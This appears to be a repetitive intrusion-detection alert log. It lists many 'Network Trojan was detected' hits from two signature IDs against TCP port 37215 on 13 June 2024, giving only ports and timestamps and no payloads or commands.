              SID:2835222
              Source Port:37810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935623
              SID:2835222
              Source Port:33188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211540
              SID:2829579
              Source Port:34018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439184
              SID:2829579
              Source Port:41332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527641
              SID:2835222
              Source Port:35662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090072
              SID:2835222
              Source Port:38996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309005
              SID:2829579
              Source Port:45544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869360
              SID:2835222
              Source Port:35286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368781
              SID:2835222
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954140
              SID:2829579
              Source Port:59862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486037
              SID:2835222
              Source Port:43734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106266
              SID:2829579
              Source Port:46818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376562
              SID:2835222
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222216
              SID:2835222
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048462
              SID:2829579
              Source Port:56020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821614
              SID:2829579
              Source Port:42630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016844
              SID:2829579
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308343
              SID:2829579
              Source Port:59006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610586
              SID:2835222
              Source Port:54020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173189
              SID:2835222
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613937
              SID:2835222
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404098
              SID:2835222
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257824
              SID:2835222
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672105
              SID:2835222
              Source Port:45160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990901
              SID:2829579
              Source Port:41652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545369
              SID:2829579
              Source Port:36474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870478
              SID:2829579
              Source Port:34582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784274
              SID:2829579
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954957
              SID:2835222
              Source Port:53592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912155
              SID:2835222
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028324
              SID:2829579
              Source Port:54390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887648
              SID:2835222
              Source Port:41496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042877
              SID:2835222
              Source Port:54730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254979
              SID:2829579
              Source Port:41118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137824
              SID:2829579
              Source Port:43452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630770
              SID:2829579
              Source Port:57900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672072
              SID:2829579
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298483
              SID:2829579
              Source Port:58180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409659
              SID:2829579
              Source Port:44036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214480
              SID:2835222
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457908
              SID:2835222
              Source Port:42278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785606
              SID:2829579
              Source Port:55164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012104
              SID:2835222
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048704
              SID:2829579
              Source Port:54980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485638
              SID:2835222
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478222
              SID:2829579
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509727
              SID:2835222
              Source Port:50794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176728
              SID:2835222
              Source Port:44660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702518
              SID:2829579
              Source Port:34978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420755
              SID:2829579
              Source Port:37826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255498
              SID:2829579
              Source Port:55330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371018
              SID:2829579
              Source Port:54462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841840
              SID:2835222
              Source Port:58022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913826
              SID:2829579
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109466
              SID:2829579
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349314
              SID:2829579
              Source Port:55912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010098
              SID:2835222
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506353
              SID:2829579
              Source Port:54406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694487
              SID:2829579
              Source Port:46812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096347
              SID:2835222
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614622
              SID:2829579
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630013
              SID:2829579
              Source Port:41536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089163
              SID:2829579
              Source Port:60696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787311
              SID:2829579
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678678
              SID:2829579
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672234
              SID:2835222
              Source Port:60496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976159
              SID:2829579
              Source Port:35444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819832
              SID:2835222
              Source Port:58612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836250
              SID:2835222
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191987
              SID:2835222
              Source Port:37772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475108
              SID:2829579
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013868
              SID:2829579
              Source Port:45810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455012
              SID:2835222
              Source Port:53078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028492
              SID:2835222
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611084
              SID:2835222
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155881
              SID:2829579
              Source Port:47412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528092
              SID:2829579
              Source Port:35154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656459
              SID:2829579
              Source Port:56144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697298
              SID:2829579
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913347
              SID:2835222
              Source Port:51984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220203
              SID:2829579
              Source Port:50588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170623
              SID:2835222
              Source Port:34762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077974
              SID:2829579
              Source Port:49614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348865
              SID:2829579
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176031
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631872
              SID:2835222
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212474
              SID:2829579
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839728
              SID:2829579
              Source Port:42772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096196
              SID:2835222
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210672
              SID:2829579
              Source Port:55110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159295
              SID:2835222
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991652
              SID:2829579
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054887
              SID:2829579
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528436
              SID:2835222
              Source Port:36164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244247
              SID:2835222
              Source Port:47788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750757
              SID:2835222
              Source Port:57096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241102
              SID:2835222
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564576
              SID:2835222
              Source Port:58284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153291
              SID:2829579
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262409
              SID:2835222
              Source Port:58200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321025
              SID:2829579
              Source Port:45876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909618
              SID:2829579
              Source Port:49298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832882
              SID:2835222
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913889
              SID:2829579
              Source Port:57890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374846
              SID:2835222
              Source Port:59318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.673899
              SID:2835222
              Source Port:37436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248271
              SID:2829579
              Source Port:54550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169892
              SID:2829579
              Source Port:60192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419686
              SID:2835222
              Source Port:60594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440722
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125335
              SID:2835222
              Source Port:38142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484452
              SID:2835222
              Source Port:54376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485522
              SID:2835222
              Source Port:38012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359254
              SID:2829579
              Source Port:40846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300386
              SID:2829579
              Source Port:40390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099639
              SID:2835222
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180479
              SID:2829579
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044921
              SID:2835222
              Source Port:43782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258608
              SID:2835222
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632458
              SID:2829579
              Source Port:39816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889556
              SID:2829579
              Source Port:41416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252832
              SID:2835222
              Source Port:55686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458099
              SID:2835222
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805664
              SID:2835222
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193999
              SID:2835222
              Source Port:40204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821453
              SID:2829579
              Source Port:57428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605755
              SID:2835222
              Source Port:55796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836020
              SID:2835222
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476058
              SID:2829579
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086247
              SID:2829579
              Source Port:50556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452525
              SID:2829579
              Source Port:52620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277333
              SID:2829579
              Source Port:53186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629754
              SID:2835222
              Source Port:34506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756699
              SID:2829579
              Source Port:55676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295467
              SID:2835222
              Source Port:46346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303695
              SID:2829579
              Source Port:52232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452024
              SID:2829579
              Source Port:56022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358063
              SID:2829579
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350560
              SID:2829579
              Source Port:56706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730901
              SID:2829579
              Source Port:39690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155300
              SID:2835222
              Source Port:54818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631340
              SID:2829579
              Source Port:57174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099910
              SID:2835222
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174048
              SID:2829579
              Source Port:49562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214025
              SID:2835222
              Source Port:45066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350147
              SID:2835222
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307683
              SID:2835222
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487399
              SID:2829579
              Source Port:40828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176094
              SID:2829579
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565040
              SID:2829579
              Source Port:41212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671147
              SID:2835222
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613802
              SID:2835222
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090919
              SID:2829579
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128231
              SID:2835222
              Source Port:39602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635878
              SID:2835222
              Source Port:41240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056381
              SID:2835222
              Source Port:58982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836499
              SID:2829579
              Source Port:59844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129809
              SID:2835222
              Source Port:59386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941862
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833441
              SID:2835222
              Source Port:52070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359079
              SID:2835222
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420035
              SID:2829579
              Source Port:47510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614170
              SID:2835222
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089764
              SID:2829579
              Source Port:59452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196425
              SID:2829579
              Source Port:60660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546356
              SID:2829579
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407647
              SID:2829579
              Source Port:36474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909738
              SID:2829579
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157714
              SID:2829579
              Source Port:60546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867166
              SID:2835222
              Source Port:54930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823175
              SID:2829579
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832726
              SID:2829579
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086969
              SID:2835222
              Source Port:45668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321259
              SID:2829579
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485677
              SID:2829579
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636050
              SID:2829579
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107025
              SID:2835222
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506177
              SID:2829579
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055889
              SID:2829579
              Source Port:60510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936468
              SID:2829579
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610768
              SID:2829579
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358226
              SID:2835222
              Source Port:38272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569171
              SID:2829579
              Source Port:59560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487487
              SID:2835222
              Source Port:40776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267470
              SID:2835222
              Source Port:39308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834983
              SID:2835222
              Source Port:58036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110232
              SID:2835222
              Source Port:59400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754241
              SID:2829579
              Source Port:39990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093339
              SID:2835222
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488548
              SID:2829579
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785430
              SID:2835222
              Source Port:38974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632126
              SID:2835222
              Source Port:50650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278861
              SID:2829579
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822890
              SID:2835222
              Source Port:52572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630718
              SID:2829579
              Source Port:35424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800360
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978730
              SID:2829579
              Source Port:50230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079848
              SID:2835222
              Source Port:44646
              Destination Port:37215
